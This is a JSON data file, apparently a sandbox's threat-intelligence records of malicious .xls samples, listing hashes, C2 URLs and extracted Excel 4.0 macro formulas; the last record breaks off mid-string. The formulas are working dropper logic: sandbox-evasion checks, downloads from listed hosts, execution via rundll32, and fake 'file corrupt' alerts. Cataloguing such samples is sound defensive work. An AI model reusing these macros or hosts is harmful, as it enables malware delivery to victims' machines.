{"version":"0.2","sample":{"sample":"","kind":"file","target":"521d116ce9c24accf99714e924733f72a3b3b49961717dcd1a696980e1344cde"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"521d116ce9c24accf99714e924733f72a3b3b49961717dcd1a696980e1344cde","filesize":170496,"md5":"7ccd537c35981e4f47840006b21d80d7","sha1":"24b1d16fa512f936b982f53363a42cc8c2286bed","sha256":"521d116ce9c24accf99714e924733f72a3b3b49961717dcd1a696980e1344cde","sha512":"d9ccd592f5715dcc66aa774b34b51688e315c823f6e86ed94685e253c0222421ac5b7762ff72e3b651803567106c6aede37cf70a18268df5552cab7b7a82ed5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"521d116ce9c24accf99714e924733f72a3b3b49961717dcd1a696980e1344cde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"waV4Bo0aKm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52233fb7c6a5074804a1b2d2ff504d6ae6565811ae0fc6179e19ea0d7df44376"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52233fb7c6a5074804a1b2d2ff504d6ae6565811ae0fc6179e19ea0d7df44376","filesize":113664,"md5":"197068e8b4eeafa0e70294798c933b51","sha1":"8325dc3bfad98af34c8d6dbaad797055c80f9ac1","sha256":"52233fb7c6a5074804a1b2d2ff504d6ae6565811ae0fc6179e19ea0d7df44376","sha512":"0bf6d1b0e2e7f3b7eb38b927008710707d2b5415a27b18d836e4f9388a13900d73b93da90e75cec366e2502da85f4eeb12bb7b386b6917eb5cfe7d8288b8d748","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52233fb7c6a5074804a1b2d2ff504d6ae6565811ae0fc6179e19ea0d7df44376.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"mK9y0ZsDQl\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5225c5d0fdfd23a7decdeafa340f6bd056e8e929c11346bceff65e504c0df5a8"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5225c5d0fdfd23a7decdeafa340f6bd056e8e929c11346bceff65e504c0df5a8","filesize":145920,"md5":"139cfd39ec89f27664104a556ab6ddfa","sha1":"899e917a835b03d3a28ff5f0cdc3f4f6e89e471e","sha256":"5225c5d0fdfd23a7decdeafa340f6bd056e8e929c11346bceff65e504c0df5a8","sha512":"a181b6806c7e973af4b6daa88f90102cd7498d4885f99559440ee08a27c9e943f5d39d5a0f6d581ef18629558d90b22e5fe586773a03280d3af5774aab818ec2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5225c5d0fdfd23a7decdeafa340f6bd056e8e929c11346bceff65e504c0df5a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"Rxq51Lzjxh\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5231c9d6b5b43adc9e445e93e88d9dbfc3e3f2fcf9cf281253a63f427f2e2246"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5231c9d6b5b43adc9e445e93e88d9dbfc3e3f2fcf9cf281253a63f427f2e2246","filesize":177152,"md5":"6003cb41402d3784d290996479d23acc","sha1":"0946b85b5e48bcc4adde1820a43b17b6fe2484c0","sha256":"5231c9d6b5b43adc9e445e93e88d9dbfc3e3f2fcf9cf281253a63f427f2e2246","sha512":"381c67cdcfe0662ad0e250cbcff4a73633e43807c18765346ea6238d3f54e436f2ef50482853895894d09a200276a6af3916437e6b66bd6aa54f0d98f3e5a82f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5231c9d6b5b43adc9e445e93e88d9dbfc3e3f2fcf9cf281253a63f427f2e2246.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KIh7Ny6L9I\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5241f9c27bfdfdf5230553d3d09cf7b07e73639f9ee82a38b62a20b500ef8bc9"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5241f9c27bfdfdf5230553d3d09cf7b07e73639f9ee82a38b62a20b500ef8bc9","filesize":209408,"md5":"f01ca21f637e044b84d9ed96a7137f52","sha1":"c3fb8e7532d5021a21e135c6bbf5b486553985f1","sha256":"5241f9c27bfdfdf5230553d3d09cf7b07e73639f9ee82a38b62a20b500ef8bc9","sha512":"6a4f93990908d06d19b35f8315db91e4bd44ae48512fe4b275fb7d0161d4c5703e4a14943393ceb0b6da1f488bd4f4762a78d2625fdf541c87727c9ca7f4a875","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5241f9c27bfdfdf5230553d3d09cf7b07e73639f9ee82a38b62a20b500ef8bc9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eXIe3s9P40\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5252abab1b3075afad378c9d2a3ac578e74bd920755bb935141836009a8b5105"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5252abab1b3075afad378c9d2a3ac578e74bd920755bb935141836009a8b5105","filesize":112640,"md5":"8de464acaa5c8bb09da4371c62f69ba2","sha1":"0f0c86cf225432ae17aaf882b75ee387890a6c6f","sha256":"5252abab1b3075afad378c9d2a3ac578e74bd920755bb935141836009a8b5105","sha512":"2aab020359f1d2fbf7218816fd34ca000a74a70de8128d94964cc3c01b9c6b2132380d5ddec3924668cc9ec9f657ca1d8de205efee92d5daa289d678a9c24980","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5252abab1b3075afad378c9d2a3ac578e74bd920755bb935141836009a8b5105.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"527be11b4e0e0d381a6e13e754b2dffcb1066bfbb896ed1be0f5b33a161b771b"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"527be11b4e0e0d381a6e13e754b2dffcb1066bfbb896ed1be0f5b33a161b771b","filesize":185344,"md5":"63e1bd3f6644eca22e25c93985d9a336","sha1":"aee45f0875638434fc2b041a5f52a04e085bda4b","sha256":"527be11b4e0e0d381a6e13e754b2dffcb1066bfbb896ed1be0f5b33a161b771b","sha512":"52e618f3b5d08f58c115855b1e671f3b11fa60af231ee85e0ba4cee45b3c575ebc6645290407a6eec6463c3602223c86fc0993262519abdd67a3dc2f0032e4ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"527be11b4e0e0d381a6e13e754b2dffcb1066bfbb896ed1be0f5b33a161b771b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52854dd471a39c3712de32686d2ff599f126dd3c1addd8d733e29f920ca268cb"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52854dd471a39c3712de32686d2ff599f126dd3c1addd8d733e29f920ca268cb","filesize":185344,"md5":"80a0c2c18966afe6a79c8a6f551c3967","sha1":"9c4b4e1579a9f2a78ef40bc1f3a94aeb2a1c252a","sha256":"52854dd471a39c3712de32686d2ff599f126dd3c1addd8d733e29f920ca268cb","sha512":"801e987bae6b78620309f0a6b0a384fb366032dd3d4b0274f640fd9b48c16f84b5d1ddc1beda1ba93113c821051e2bc82c0ef4a1162d5f7c76ca787eb5930f0e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52854dd471a39c3712de32686d2ff599f126dd3c1addd8d733e29f920ca268cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5290fd31bc408713fd87ea1edda238f5343f66e252fafee4d3a5fed07a097c75"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5290fd31bc408713fd87ea1edda238f5343f66e252fafee4d3a5fed07a097c75","filesize":206336,"md5":"fd1eb34bac6a7c76a3e98dcf9ca7d174","sha1":"e2995643bfa20b8eb40b15eb0bc7ff68d3c2973c","sha256":"5290fd31bc408713fd87ea1edda238f5343f66e252fafee4d3a5fed07a097c75","sha512":"adc0bc7c372fd1a0e27902942f5887b19bfa5f1a8ccc07c59a07bdf35662ce4c9d4c156d2d1cfa6aa26e9a8ef67d0f368083dc4917d16d75ecdc856aa052f1fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5290fd31bc408713fd87ea1edda238f5343f66e252fafee4d3a5fed07a097c75.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cENjQEdfvf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52b28240b3da14e9c1f35848c513f4121569185ad416e67121adbb64c5beb7be"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52b28240b3da14e9c1f35848c513f4121569185ad416e67121adbb64c5beb7be","filesize":168960,"md5":"36fb5145b81783a276960fb97a9f18a0","sha1":"ff48a86bbd123a8cb5d502f8199ffd32b8d302fb","sha256":"52b28240b3da14e9c1f35848c513f4121569185ad416e67121adbb64c5beb7be","sha512":"8bafcc157a336464d64d090d2a4272d6e338f7c9060831ae1902aef6da001745ab77c22b3b17d06c730066bddb2351cc024f1141a45a6dfee080b25534cac97f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52b28240b3da14e9c1f35848c513f4121569185ad416e67121adbb64c5beb7be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3l3WYw2umy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52b9dbfd518c82cec47da66e6a4a11556eadc21b33e9efce95777346c47f7b18"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52b9dbfd518c82cec47da66e6a4a11556eadc21b33e9efce95777346c47f7b18","filesize":141824,"md5":"3487d4123ad8b3b0277fbec57c70c1bf","sha1":"aff54584ce3de16fa798cddca4d0dffca7e65831","sha256":"52b9dbfd518c82cec47da66e6a4a11556eadc21b33e9efce95777346c47f7b18","sha512":"8a1472b5e176e5b60cbc13f9e81b32185dfe326c7123fa6b6aa40f48a4d0e31bf401bc843cc4ad6076c084dacee97c7fec2f5dc2adb6d90aeabe7fe9c8a54f3a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52b9dbfd518c82cec47da66e6a4a11556eadc21b33e9efce95777346c47f7b18.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"abnq82krOG\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52d95b02cca6b4e7ab01601acb8273533593e9b0751016145711aeff40972441"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52d95b02cca6b4e7ab01601acb8273533593e9b0751016145711aeff40972441","filesize":185344,"md5":"ac4cdda7f3c104076958fd8e1ad8ca91","sha1":"9d952456fb8f73496d1b66214319614e082f69c7","sha256":"52d95b02cca6b4e7ab01601acb8273533593e9b0751016145711aeff40972441","sha512":"32f258d5d1f896cf81c72329d93ff2ffed67eb4720b3e4f835fadd739ad42eb09486f3e4619fb8cbe9727b9635437a7a2db666283cb25cd1ca69329555735312","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52d95b02cca6b4e7ab01601acb8273533593e9b0751016145711aeff40972441.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52e006d33284d9849ce5bb53ea6ecc4e35c87dbb1ce9201f6631d90c97a79f78"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52e006d33284d9849ce5bb53ea6ecc4e35c87dbb1ce9201f6631d90c97a79f78","filesize":116224,"md5":"7cbb7c2b615c16d0fb57776dd001d9f4","sha1":"6c52aff2de87113bce8fe6e01cbc09501e8460ec","sha256":"52e006d33284d9849ce5bb53ea6ecc4e35c87dbb1ce9201f6631d90c97a79f78","sha512":"5db1387bcb0822e962ea66c4d7d27bd18f0be98f55c203e36f4230208465005fcc5c26f3ea6984b783d2554022cfdaa83c54be978e53634a2eb6209e5eae254f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52e006d33284d9849ce5bb53ea6ecc4e35c87dbb1ce9201f6631d90c97a79f78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ad1r8uEW6Q\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53015c92c75ee134b4fd4c7817e0cde74e2a6ccccc32b36441ba51fcf10bff39"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"53015c92c75ee134b4fd4c7817e0cde74e2a6ccccc32b36441ba51fcf10bff39","filesize":168960,"md5":"8583560c010a398fad5c0358c9cc4145","sha1":"196e1aefe325628836913d1f84ba5df56a643a2a","sha256":"53015c92c75ee134b4fd4c7817e0cde74e2a6ccccc32b36441ba51fcf10bff39","sha512":"78e8d95edc38ef76dfe762f15f03ddf956f92c443dbf0a3b370c96eab48cfa81341f19b79212704e3b675919cb10b95590eca25c271ebd836f4a0df8d79c84d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53015c92c75ee134b4fd4c7817e0cde74e2a6ccccc32b36441ba51fcf10bff39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AqjVaug4ad\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53105a3d1800f2ce998db3c7770d86099b73f86fd3cbe846dafa63e383de18b3"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"53105a3d1800f2ce998db3c7770d86099b73f86fd3cbe846dafa63e383de18b3","filesize":206336,"md5":"4fafab3f278c388c424cbc4a53320c28","sha1":"e344d2d59b2a5510ff40cca0036cd79685cfd81b","sha256":"53105a3d1800f2ce998db3c7770d86099b73f86fd3cbe846dafa63e383de18b3","sha512":"0e7a7afd89407ac76c1d191918089a97b1d6f6367a81cada0d7d8761ad00a6959a24de423fa64881d2cba26c631c0dc3cfc46eb6dee20ba7651a571eb274d055","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53105a3d1800f2ce998db3c7770d86099b73f86fd3cbe846dafa63e383de18b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"u3TNBMnyDf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5329f84356f3495486b83123367bae4e82a10e38f4191aa0d0264c2d38b38d62"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5329f84356f3495486b83123367bae4e82a10e38f4191aa0d0264c2d38b38d62","filesize":225280,"md5":"376c86d6342734e2ff185be52bbd5e19","sha1":"92011222de5fa334fe5e190be36acc60aa41aa1a","sha256":"5329f84356f3495486b83123367bae4e82a10e38f4191aa0d0264c2d38b38d62","sha512":"e1e737e9cc3b9e630af761f1b9fded653586e4879be8b4733c747ecff540fd42cf73071fc08832388b2242f3ee30f4569a612978b3a6ee2ee90e213969dde03e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5329f84356f3495486b83123367bae4e82a10e38f4191aa0d0264c2d38b38d62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg 